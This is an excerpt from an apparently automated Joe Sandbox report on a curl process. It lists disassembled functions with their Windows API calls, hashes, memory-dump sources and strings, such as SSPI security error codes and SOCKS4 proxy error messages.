                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: EnumLocalesSystem
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2099609381-0
                                                                                                                                                                    • Opcode ID: 331b87f4d014522ccb5bc08223cbc64e2d5e78b568c31756bbbba2177e7f8a81
                                                                                                                                                                    • Instruction ID: 44c0c740b61ba2bc80eaa7ab1b796d86148b0d9e6c6865c4d758d6c4866d1844
                                                                                                                                                                    • Opcode Fuzzy Hash: 331b87f4d014522ccb5bc08223cbc64e2d5e78b568c31756bbbba2177e7f8a81
                                                                                                                                                                    • Instruction Fuzzy Hash: E201D4324703079FE7209FB8D40DB65BBE0EF01711F10492AE459D56D2D7B5A868DA40
                                                                                                                                                                    Function 002D6D39 Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,002D6B2F,00000000,00000000,?), ref: 002D6D63
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: InfoLocale
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2299586839-0
                                                                                                                                                                    • Opcode ID: 72a18609e806e8d2902042f1445a1f5f4d40fe85bff55ece447499b93d9ae4d9
                                                                                                                                                                    • Instruction ID: fcbb857e0218a253b3d21e2088c98153734cad0f8a01f01a81fff85a3000acd3
                                                                                                                                                                    • Opcode Fuzzy Hash: 72a18609e806e8d2902042f1445a1f5f4d40fe85bff55ece447499b93d9ae4d9
                                                                                                                                                                    • Instruction Fuzzy Hash: B2F0F632B70216BBEB245A70EC09BBD7799EB00364F044127E909A3250EA74BD6089A0
                                                                                                                                                                    Function 002D68EA Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • EnumSystemLocalesW.KERNEL32(002D6B62,00000001,?,?,002D6E5B,002C711E,?,?,00000055,?,?,002C711E,?,?,?), ref: 002D692F
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: EnumLocalesSystem
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2099609381-0
                                                                                                                                                                    • Opcode ID: d16bfacda555e236f74ba921ca8d721f38cecd0b4e220cbc353b5498974c9e3d
                                                                                                                                                                    • Instruction ID: 74474db8064b55a84b2a2091601aa81ca4fc93c4051443225d86a62dbc6259cc
                                                                                                                                                                    • Opcode Fuzzy Hash: d16bfacda555e236f74ba921ca8d721f38cecd0b4e220cbc353b5498974c9e3d
                                                                                                                                                                    • Instruction Fuzzy Hash: F1F02072970705EEE720AF30EC09FE53B85DB02760F108417F8998A2E2CAB06C608A60
                                                                                                                                                                    Function 002D682D Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • EnumSystemLocalesW.KERNEL32(002D677D,00000001,?,?,002D6EB2,002C711E,?,?,00000055,?,?,002C711E,?,?,?), ref: 002D6859
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: EnumLocalesSystem
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2099609381-0
                                                                                                                                                                    • Opcode ID: 321d9b302f35af330a0a51fcb3c7a19a3f27439ca4b0e0cbe6585b996fbfaa8c
                                                                                                                                                                    • Instruction ID: f8e9787e32b09e3f96d3949f1a9cefb8d35e12a995d5a53fff43537ada9cb2d5
                                                                                                                                                                    • Opcode Fuzzy Hash: 321d9b302f35af330a0a51fcb3c7a19a3f27439ca4b0e0cbe6585b996fbfaa8c
                                                                                                                                                                    • Instruction Fuzzy Hash: 8EE02C72920B09AFE7006F34DC08BB47B94EB02720F000206FD588A2A0C7B0AC208A80
                                                                                                                                                                    Function 002D7148 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • EnumSystemLocalesW.KERNEL32(002D7134,00000001,?,002D60FD,002D619B,00000003,00000000,?,?,00000000,00000000,00000000,00000000,00000000), ref: 002D7176
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: EnumLocalesSystem
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2099609381-0
                                                                                                                                                                    • Opcode ID: e388c28727fdc0f71a5d5f10372d6b7a2c5367f7cbe3ee35a8ab20c8206077a9
                                                                                                                                                                    • Instruction ID: 90beb917ed806305d0daa27b6c9befe855a318ae795cc2ad33d7b187513a91eb
                                                                                                                                                                    • Opcode Fuzzy Hash: e388c28727fdc0f71a5d5f10372d6b7a2c5367f7cbe3ee35a8ab20c8206077a9
                                                                                                                                                                    • Instruction Fuzzy Hash: FEE0B632155308BFDF12CFA5FC45BAA3BA9AB09710F408502F55C9A270D6B5E9A1DB44
                                                                                                                                                                    Function 002D7185 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,20001004,?,002C71A6,?,002C71A6,?,20001004,?,00000002,?,00000004,?,00000000), ref: 002D71AC
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: InfoLocale
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2299586839-0
                                                                                                                                                                    • Opcode ID: eadd8c111eab5a04f179d328e1a777c3b80c5862f57ec03235eee2e66c51b50e
                                                                                                                                                                    • Instruction ID: 51d8a0043f41b44ca7f2afa01c65dfb1551a05c0b2dec4906224373611f1ab84
                                                                                                                                                                    • Opcode Fuzzy Hash: eadd8c111eab5a04f179d328e1a777c3b80c5862f57ec03235eee2e66c51b50e
                                                                                                                                                                    • Instruction Fuzzy Hash: 22D01732008509FF9F029FE1FC0986A3B6DFB48324B004402F91C45221EA76E8309B21
                                                                                                                                                                    Function 002CBAB0 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(?), ref: 002CBAB6
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3192549508-0
                                                                                                                                                                    • Opcode ID: fd9895274366d0dd62c24ca2589b1f4242b3c45a6b225f46c2f108652172c2ae
                                                                                                                                                                    • Instruction ID: 99f5b068602e1fdcd0b79c30de39fed72b0949bf0e9384fcc16394b1b1d20d47
                                                                                                                                                                    • Opcode Fuzzy Hash: fd9895274366d0dd62c24ca2589b1f4242b3c45a6b225f46c2f108652172c2ae
                                                                                                                                                                    • Instruction Fuzzy Hash: 2AA0113008020CAB8B002B82FC0AA883F2CEA082A0B008022F80C000208B23E8208A80
                                                                                                                                                                    Function 001D2490 Relevance: 152.5, APIs: 4, Strings: 83, Instructions: 275windowCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?), ref: 001D24B2
                                                                                                                                                                    • FormatMessageA.KERNEL32(00001200,00000000,00000000,00000000,?,000000FF,00000000), ref: 001D284C
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 001D28D6
                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 001D28E1
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$FormatMessage
                                                                                                                                                                    • String ID: %s (0x%04X%04X)$%s - %s$No error$SEC_E_ALGORITHM_MISMATCH$SEC_E_BAD_BINDINGS$SEC_E_BAD_PKGID$SEC_E_BUFFER_TOO_SMALL$SEC_E_CANNOT_INSTALL$SEC_E_CANNOT_PACK$SEC_E_CERT_EXPIRED$SEC_E_CERT_UNKNOWN$SEC_E_CERT_WRONG_USAGE$SEC_E_CONTEXT_EXPIRED$SEC_E_CROSSREALM_DELEGATION_FAILURE$SEC_E_CRYPTO_SYSTEM_INVALID$SEC_E_DECRYPT_FAILURE$SEC_E_DELEGATION_POLICY$SEC_E_DELEGATION_REQUIRED$SEC_E_DOWNGRADE_DETECTED$SEC_E_ENCRYPT_FAILURE$SEC_E_ILLEGAL_MESSAGE$SEC_E_INCOMPLETE_CREDENTIALS$SEC_E_INCOMPLETE_MESSAGE$SEC_E_INSUFFICIENT_MEMORY$SEC_E_INTERNAL_ERROR$SEC_E_INVALID_HANDLE$SEC_E_INVALID_PARAMETER$SEC_E_INVALID_TOKEN$SEC_E_ISSUING_CA_UNTRUSTED$SEC_E_ISSUING_CA_UNTRUSTED_KDC$SEC_E_KDC_CERT_EXPIRED$SEC_E_KDC_CERT_REVOKED$SEC_E_KDC_INVALID_REQUEST$SEC_E_KDC_UNABLE_TO_REFER$SEC_E_KDC_UNKNOWN_ETYPE$SEC_E_LOGON_DENIED$SEC_E_MAX_REFERRALS_EXCEEDED$SEC_E_MESSAGE_ALTERED$SEC_E_MULTIPLE_ACCOUNTS$SEC_E_MUST_BE_KDC$SEC_E_NOT_OWNER$SEC_E_NO_AUTHENTICATING_AUTHORITY$SEC_E_NO_CREDENTIALS$SEC_E_NO_IMPERSONATION$SEC_E_NO_IP_ADDRESSES$SEC_E_NO_KERB_KEY$SEC_E_NO_PA_DATA$SEC_E_NO_S4U_PROT_SUPPORT$SEC_E_NO_TGT_REPLY$SEC_E_OUT_OF_SEQUENCE$SEC_E_PKINIT_CLIENT_FAILURE$SEC_E_PKINIT_NAME_MISMATCH$SEC_E_POLICY_NLTM_ONLY$SEC_E_QOP_NOT_SUPPORTED$SEC_E_REVOCATION_OFFLINE_C$SEC_E_REVOCATION_OFFLINE_KDC$SEC_E_SECPKG_NOT_FOUND$SEC_E_SECURITY_QOS_FAILED$SEC_E_SHUTDOWN_IN_PROGRESS$SEC_E_SMARTCARD_CERT_EXPIRED$SEC_E_SMARTCARD_CERT_REVOKED$SEC_E_SMARTCARD_LOGON_REQUIRED$SEC_E_STRONG_CRYPTO_NOT_SUPPORTED$SEC_E_TARGET_UNKNOWN$SEC_E_TIME_SKEW$SEC_E_TOO_MANY_PRINCIPALS$SEC_E_UNFINISHED_CONTEXT_DELETED$SEC_E_UNKNOWN_CREDENTIALS$SEC_E_UNSUPPORTED_FUNCTION$SEC_E_UNSUPPORTED_PREAUTH$SEC_E_UNTRUSTED_ROOT$SEC_E_WRONG_CREDENTIAL_HANDLE$SEC_E_WRONG_PRINCIPAL$SEC_I_COMPLETE_AND_CONTINUE$SEC_I_COMPLETE_NEEDED$SEC_I_CONTEXT_EXPIRED$SEC_I_CONTINUE_NEEDED$SEC_I_INCOMPLETE_CREDENTIALS$SEC_I_LOCAL_LOGON$SEC_I_NO_LSA_CONTEXT$SEC_I_RENEGOTIATE$SEC_I_SIGNATURE_NEEDED$Unknown error
                                                                                                                                                                    • API String ID: 71157656-764561750
                                                                                                                                                                    • Opcode ID: 71fef97b285bdd08be799431827326709c62de5f6995f4291f023958000ec18b
                                                                                                                                                                    • Instruction ID: f8b1688507caf0f236db8ae6f6d57c8edc5ed69d72f5ccb1fbc126acd289edcd
                                                                                                                                                                    • Opcode Fuzzy Hash: 71fef97b285bdd08be799431827326709c62de5f6995f4291f023958000ec18b
                                                                                                                                                                    • Instruction Fuzzy Hash: 7F91E22E20C28187D33E85195861EB77286EBB9300F26453FE6736A3E9DF7548A57313
                                                                                                                                                                    Function 001F0590 Relevance: 31.9, APIs: 3, Strings: 15, Instructions: 431COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetTickCount64.KERNEL32 ref: 001F0616
                                                                                                                                                                    • ioctlsocket.WS2_32(8004667E,8004667E,?), ref: 001F0689
                                                                                                                                                                      • Part of subcall function 001DF270: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,?,?,?,?,?,001DD2A7), ref: 001DF288
                                                                                                                                                                      • Part of subcall function 001DF270: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 001DF296
                                                                                                                                                                      • Part of subcall function 001F0430: GetTickCount64.KERNEL32 ref: 001F0491
                                                                                                                                                                      • Part of subcall function 001F0430: recv.WS2_32(?,?,?,00000000), ref: 001F0513
                                                                                                                                                                      • Part of subcall function 001F0430: WSAGetLastError.WS2_32(?,000003E8,00000000,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 001F051E
                                                                                                                                                                    Strings
                                                                                                                                                                    • %hu.%hu.%hu.%hu, xrefs: 001F076F
                                                                                                                                                                    • Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed., xrefs: 001F09FC
                                                                                                                                                                    • SOCKS4 reply has wrong version, version should be 4., xrefs: 001F0965
                                                                                                                                                                    • Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids., xrefs: 001F0A7E
                                                                                                                                                                    • SOCKS4 communication to %s:%d, xrefs: 001F069B
                                                                                                                                                                    • Failed to receive SOCKS4 connect request ack., xrefs: 001F0AD1
                                                                                                                                                                    • Failed to send SOCKS4 connect request., xrefs: 001F091B
                                                                                                                                                                    • Connection time-out, xrefs: 001F0AF5
                                                                                                                                                                    • SOCKS4 connect to %s (locally resolved), xrefs: 001F07B2
                                                                                                                                                                    • Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown., xrefs: 001F0ABC
                                                                                                                                                                    • Failed to resolve "%s" for SOCKS4 connect., xrefs: 001F07D0
